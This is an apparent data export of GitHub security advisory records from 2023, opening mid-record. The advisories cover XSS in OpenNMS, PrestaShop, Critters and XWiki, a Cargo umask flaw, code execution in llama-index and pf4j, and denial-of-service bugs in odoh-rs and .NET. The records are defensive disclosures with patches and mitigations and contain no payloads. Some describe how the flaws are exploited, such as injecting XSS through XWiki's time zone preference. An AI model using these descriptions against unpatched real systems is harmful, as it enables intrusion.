[{'package': {'ecosystem': 'Pub', 'name': 'archive'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.7'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39137'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/issues/266'}, {'type': 'WEB', 'url': 'https://github.com/brendan-duncan/archive/commit/0d17b270a3c33d3bed56cadd9a43da7717ab11f4'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/brendan-duncan/archive'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-3'}, {'type': 'WEB', 'url': 'https://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_name_spoofing/'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:43:38Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-qfw7-pfxx-h9q2
|
2023-08-23T20:07:41Z
|
2023-08-14T18:32:59Z
| null |
['CVE-2023-40311']
|
OpenNMS vulnerable to Cross-site Scripting
|
Multiple stored XSS were found on different JSP files with unsanitized parameters in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms that allow an attacker to store on database and then load on JSPs or Angular templates. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Jordi Miralles Comins for reporting this issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40311'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6365'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6366'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/6ccc5de1a23d440560e0f09dfd94f8392c21e70d'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/c67d1cae2fa1fb806c9d422f6e6fbf4ebfde6b60'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:12:09Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xw2r-f8xv-c8xp
|
2023-08-09T14:37:16Z
|
2023-08-09T14:37:16Z
| null |
['CVE-2023-39527']
|
PrestaShop XSS injection through Validate::isCleanHTML method
|
### Impact
xss injection through `isCleanHTML` method
### Patches
1.7.8.10
8.0.5
8.1.1
### Found by
Aleksey Solovev (Positive Technologies)
### Workarounds
### References
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.0'}, {'fixed': '8.1.1'}]}], 'versions': ['8.1.0']}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.8.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-xw2r-f8xv-c8xp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39527'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/afc14f8eaa058b3e6a20ac43e033ee2656fb88b4'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]
|
{'cwe_ids': ['CWE-116'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:37:16Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-j3xp-wfr4-hx87
|
2023-08-03T16:30:52Z
|
2023-08-03T16:30:52Z
| null |
['CVE-2023-38497']
|
Cargo not respecting umask when extracting crate archives
|
The Rust Security Response WG was notified that Cargo did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user.
This vulnerability has been assigned CVE-2023-38497.
## Overview
In UNIX-like systems, each file has three sets of permissions: for the user owning the file, for the group owning the file, and for all other local users. The "[umask][1]" is configured on most systems to limit those permissions during file creation, removing dangerous ones. For example, the default umask on macOS and most Linux distributions only allow the user owning a file to write to it, preventing the group owning it or other local users from doing the same.
When a dependency is downloaded by Cargo, its source code has to be extracted on disk to allow the Rust compiler to read as part of the build. To improve performance, this extraction only happens the first time a dependency is used, caching the pre-extracted files for future invocations.
Unfortunately, it was discovered that Cargo did not respect the umask during extraction, and propagated the permissions stored in the crate archive as-is. If an archive contained files writeable by any user on the system (and the system configuration didn't prevent writes through other security measures), another local user on the system could replace or tweak the source code of a dependency, potentially achieving code execution the next time the project is compiled.
## Affected Versions
All Rust versions before 1.71.1 on UNIX-like systems (like macOS and Linux) are affected. Note that additional system-dependent security measures configured on the local system might prevent the vulnerability from being exploited.
Users on Windows and other non-UNIX-like systems are not affected.
## Mitigations
We recommend all users to update to Rust 1.71.1, which will be released later today, as it fixes the vulnerability by respecting the umask when extracting crate archives. If you build your own toolchain, patches for 1.71.0 source tarballs are [available here][2].
To prevent existing cached extractions from being exploitable, the Cargo binary included in Rust 1.71.1 or later will purge the caches it tries to access if they were generated by older Cargo versions.
If you cannot update to Rust 1.71.1, we recommend configuring your system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`:
```
chmod go= ~/.cargo
```
## Acknowledgments
We want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy][3].
We also want to thank the members of the Rust project who helped us disclose the vulnerability: Weihang Lo for developing the fix; Eric Huss for reviewing the fix; Pietro Albini for writing this advisory; Pietro Albini, Manish Goregaokar and Josh Stone for coordinating this disclosure; Josh Triplett, Arlo Siemen, Scott Schafer, and Jacob Finkelman for advising during the disclosure.
[1]: https://en.wikipedia.org/wiki/Umask
[2]: https://github.com/rust-lang/wg-security-response/tree/main/patches/CVE-2023-38497
[3]: https://www.rust-lang.org/policies/security
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'cargo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.72.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.72.1'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/security/advisories/GHSA-j3xp-wfr4-hx87'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38497'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/pull/12443'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/commit/d78bbf4bde3c6b95caca7512f537c6f9721426ff'}, {'type': 'WEB', 'url': 'https://en.wikipedia.org/wiki/Umask'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-lang/cargo'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/wg-security-response/tree/main/patches/CVE-2023-38497'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGKE6PGM4HIQUHPJRBQAHMELINSGN4H4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QMEXGUGPW5OBSQA6URTBNDSU3RAEFOZ4/'}, {'type': 'WEB', 'url': 'https://www.rust-lang.org/policies/security'}]
|
{'cwe_ids': ['CWE-278', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:30:52Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-gpcv-p28p-fv2p
|
2023-08-03T16:35:20Z
|
2023-08-03T16:35:20Z
| null |
['CVE-2023-3766']
|
odoh-rs's Invalid Slice Split Results in Server Panic
|
A vulnerability was discovered in the odoh-rs rust crate that stems from faulty logic during the parsing of encrypted queries. This issue specifically occurs when processing encrypted query data received from remote clients.
### Impact
An attacker with knowledge of this vulnerability could craft and send specially designed encrypted queries to targeted ODOH servers running with odoh-rs. Upon successful exploitation, the server will crash abruptly, disrupting its normal operation and rendering the service temporarily unavailable.
### Patches
Users are encouraged to update their odoh-rs's rust crate to v1.0.2.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'odoh-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/security/advisories/GHSA-gpcv-p28p-fv2p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3766'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/pull/28'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/commit/c1bc4ed71dcc9842b7dc1ea26f278f105074bbaa'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/odoh-rs'}]
|
{'cwe_ids': ['CWE-120'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:35:20Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-cx3j-qqxj-9597
|
2023-08-25T18:55:56Z
|
2023-08-11T18:57:53Z
| null |
['CVE-2023-3481']
|
Critters Cross-site Scripting Vulnerability
|
### Impact
Critters version 0.0.17-0.0.19 have an issue when parsing the HTML which leads to a potential [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) bug.
### Patches
The bug has been fixed in `v0.0.20`.
### Workarounds
Upgrading Critters version to `>0.0.20` is the easiest fix. This is a non breaking version upgrade so we recommend all users to use `v0.0.20`.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'critters'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.17'}, {'fixed': '0.0.20'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.0.19'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/security/advisories/GHSA-cx3j-qqxj-9597'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3481'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/pull/133'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/commit/7757902c9e0b3285d516359b3cb602cd9d50d80e'}, {'type': 'PACKAGE', 'url': 'https://github.com/GoogleChromeLabs/critters'}]
|
{'cwe_ids': ['CWE-116', 'CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T18:57:53Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2xxc-73fv-36f7
|
2023-08-22T18:38:15Z
|
2023-08-15T18:31:32Z
| null |
['CVE-2023-39662']
|
llama-index vulnerable to arbitrary code execution
|
An issue in llama_index v.0.7.13 and before allows a remote attacker to execute arbitrary code via the `exec` parameter in PandasQueryEngine function.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'llama-index'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.13'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39662'}, {'type': 'WEB', 'url': 'https://github.com/jerryjliu/llama_index/issues/7054'}, {'type': 'PACKAGE', 'url': 'https://github.com/jerryjliu/llama_index'}]
|
{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T21:23:47Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-3r28-rgp9-qgv4
|
2023-08-31T14:59:24Z
|
2023-08-29T00:32:04Z
| null |
['CVE-2023-40826']
|
pf4j vulnerable to remote code execution via the zippluginPath parameter
|
An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the zippluginPath parameter.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.pf4j:pf4j'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.9.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40826'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/issues/536'}, {'type': 'PACKAGE', 'url': 'https://github.com/pf4j/pf4j'}]
|
{'cwe_ids': ['CWE-22', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:41:26Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p57v-gv7q-4xfm
|
2023-08-09T13:04:54Z
|
2023-08-09T13:04:54Z
| null |
['CVE-2023-38178']
|
.NET Denial of Service Vulnerability
|
# Microsoft Security Advisory CVE-2023-38178: .NET Denial of Service Vulnerability
## <a name="executive-summary"></a>Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
A vulnerability exists in .NET Kestrel where a malicious client can bypass QUIC stream limit in HTTP/3 in both ASP.NET and .NET runtimes resulting in denial of service.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/268
### <a name="mitigation-factors"></a>Mitigation factors
Microsoft has not identified any mitigating factors for this vulnerability.
## <a name="affected-software"></a>Affected software
* Any .NET 7.0 application running on .NET 7.0.9 or earlier.
If your application uses the following package versions, ensure you update to the latest version of .NET.
### <a name=".NET 7"></a>.NET 7
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10
[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10
[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10
[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10
[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/ Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.9 | 7.0.10
[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10
[Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10
[Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10
### <a name=".NET 6"></a>.NET 6
.NET 6 included HTTP/3 support as a [preview feature](https://learn.microsoft.com/dotnet/core/extensions/httpclient-http3#http3-support-in-net-6) , which requires specific opt-in code. If you are using HTTP/3 in .NET 6 you must update your application to .NET 7, where the feature is supported, to fix the vulnerability. Future versions of .NET will disable the preview feature entirely.
## Advisory FAQ
### <a name="how-affected"></a>How do I know if I am affected?
If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.
### <a name="how-fix"></a>How do I fix the issue?
* To fix the issue please install the latest version of .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
* To fix this issue on Linux, please update `libmsquic` to 2.2+
* If you are using one of the affected packages, please update to the patched version listed above.
* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;
```
.NET Core SDK (reflecting any global.json):
Version: 7.0.400
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 7.0.10
Commit: 8473146e7d
.NET Core SDKs installed:
7.0.400 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspNetCore.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.NETCore.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
Microsoft.WindowsDesktop.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
```
* If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.700 (for Visual Studio 2022 v17.7) from https://dotnet.microsoft.com/download/dotnet-core/6.0.
.NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.
Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.
Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
## Other Information
### Reporting Security Issues
If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>.
### Support
You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.
### Disclaimer
The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
### External Links
[CVE-2023-38178]( https://www.cve.org/CVERecord?id=CVE-2023-38178)
### Revisions
V1.0 (August 08, 2023): Advisory published.
_Version 1.0_
_Last Updated 2023-08-08_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-p57v-gv7q-4xfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38178'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38178'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T13:04:54Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8c37-7qx3-4c4p
|
2023-09-21T14:13:41Z
|
2023-08-09T20:57:57Z
| null |
[]
|
Blst has logical error in SigValidate in Go bindings
|
### Impact
Blst versions v0.3.0 through 0.3.10 failed to perform a signature group-check if the call to `SigValidate` in the Go bindings was complemented with a check for infinity. Formally speaking, infinity, or the identity element of the elliptic curve group, is a member of the group, and the group-check should allow it. An initial review of blst users on GitHub did not uncover any use of this function with the complementary infinity check. This optional check was added as a convenience feature because despite infinity being a legitimate member of the group, individual signatures should never be infinite (as it is equivalent to having zero for the secret key), and observing one should raise a flag.
### Description
The vulnerable function is declared as `SigValidate(sigInfcheck bool) bool` and if called with `sigInfcheck` argument set to `true`, the group-check was omitted. The group-check is required to be performed on untrusted input, because the pairing, the corner-stone operation of the signature scheme, is defined only on points that are members of a specific cyclic group, which is a subset of all the possible points on elliptic curves in question. Submitting an untrusted point outside the group opens up the possibility of accepting an alternative signature for a chosen message.
It should be noted that the SigValidate call is not the only way to perform the group-checks. There are optional checks integrated into various other verification methods, such as `Verify`, `AggregateVerify`, etc., as well as signature aggregation methods, such as `PairingAggregate*`. The reason why there are multiple options is that the group-check is a relatively expensive operation, and application developers are arguably entitled the freedom to choose when it's performed.
### Patches
This issue has been resolved in the v0.3.11 release and users are advised to update if their application is affected or alternatively omit the complementary infinity check.
### Credits
A special thanks to Yunjong Jeong (@blukat29) for the discovery and disclosure of this vulnerability.
|
[]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/supranational/blst'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '0.3.11'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/supranational/blst/security/advisories/GHSA-8c37-7qx3-4c4p'}, {'type': 'WEB', 'url': 'https://github.com/supranational/blst/commit/fb91221c91c82f65bfc7f243256308977a06d48b'}, {'type': 'PACKAGE', 'url': 'https://github.com/supranational/blst'}, {'type': 'WEB', 'url': 'https://github.com/supranational/blst/releases/tag/v0.3.11'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T20:57:57Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-qxwc-wchr-5h29
|
2023-08-16T21:06:56Z
|
2023-08-16T15:30:18Z
| null |
['CVE-2023-40348']
|
Jenkins Gogs Plugin vulnerable to unsafe default behavior and information disclosure
|
Jenkins Gogs Plugin provides a webhook endpoint at `/gogs-webhook` that can be used to trigger builds of jobs. In Gogs Plugin 1.0.15 and earlier, an option to specify a Gogs secret for this webhook is provided, but not enabled by default.
This allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified job name.
Additionally, the output of the webhook endpoint includes whether a job corresponding to the attacker-specified job name exists, even if the attacker has no permission to access it.
As of publication of this advisory, there is no fix.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:gogs-webhook'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.15'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40348'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-2894'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:06:56Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-h8cm-3v5f-rgp6
|
2023-08-29T22:44:58Z
|
2023-08-21T19:59:12Z
| null |
['CVE-2023-40176']
|
XWiki Platform Stored Cross-site Scripting in the user profile via the timezone displayer
|
### Impact
Any registered user can exploit a stored XSS through their user profile by setting the payload as the value of the time zone user preference. Even though the time zone is selected from a drop down (no free text value) it can still be set from JavaScript (using the browser developer tools) or by calling the save URL on the user profile with the right query string. Once the time zone is set it is displayed without escaping which means the payload gets executed for any user that visits the malicious user profile, allowing the attacker to steal information and even gain more access rights (escalation to programming rights).
The problem is present [since version 4.1M2](https://jira.xwiki.org/browse/XWIKI-7847) when the time zone user preference was introduced.
### Patches
The issue has been fixed in XWiki 14.10.5 and 15.1RC1 by https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4 . The main fix is in the [``displayer_timezone.vm``](https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4#diff-57ffb6e10fa8768e59948f2becf755699570d97b78bb12a9623e0de49e6c5c7d) precisely at this [line](https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4#diff-57ffb6e10fa8768e59948f2becf755699570d97b78bb12a9623e0de49e6c5c7dR40):
$!escapetool.xml($value)
By escaping the displayed time zone value we make sure the attacker's payload is not executed.
### Workarounds
If you want to fix this problem on older versions of XWiki that have not been patched then you need to edit ``displayer_timezone.vm`` and escape the displayed time zone value [here](https://github.com/xwiki/xwiki-platform/blob/xwiki-platform-14.10.4/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-templates/src/main/resources/templates/displayer_timezone.vm#L32):
```
- $!value
+ $!escapetool.xml($value)
```
### References
* JIRA issue https://jira.xwiki.org/browse/XWIKI-20276
* Fix https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
### Attribution
This vulnerability has been found and reported by @michitux .
|
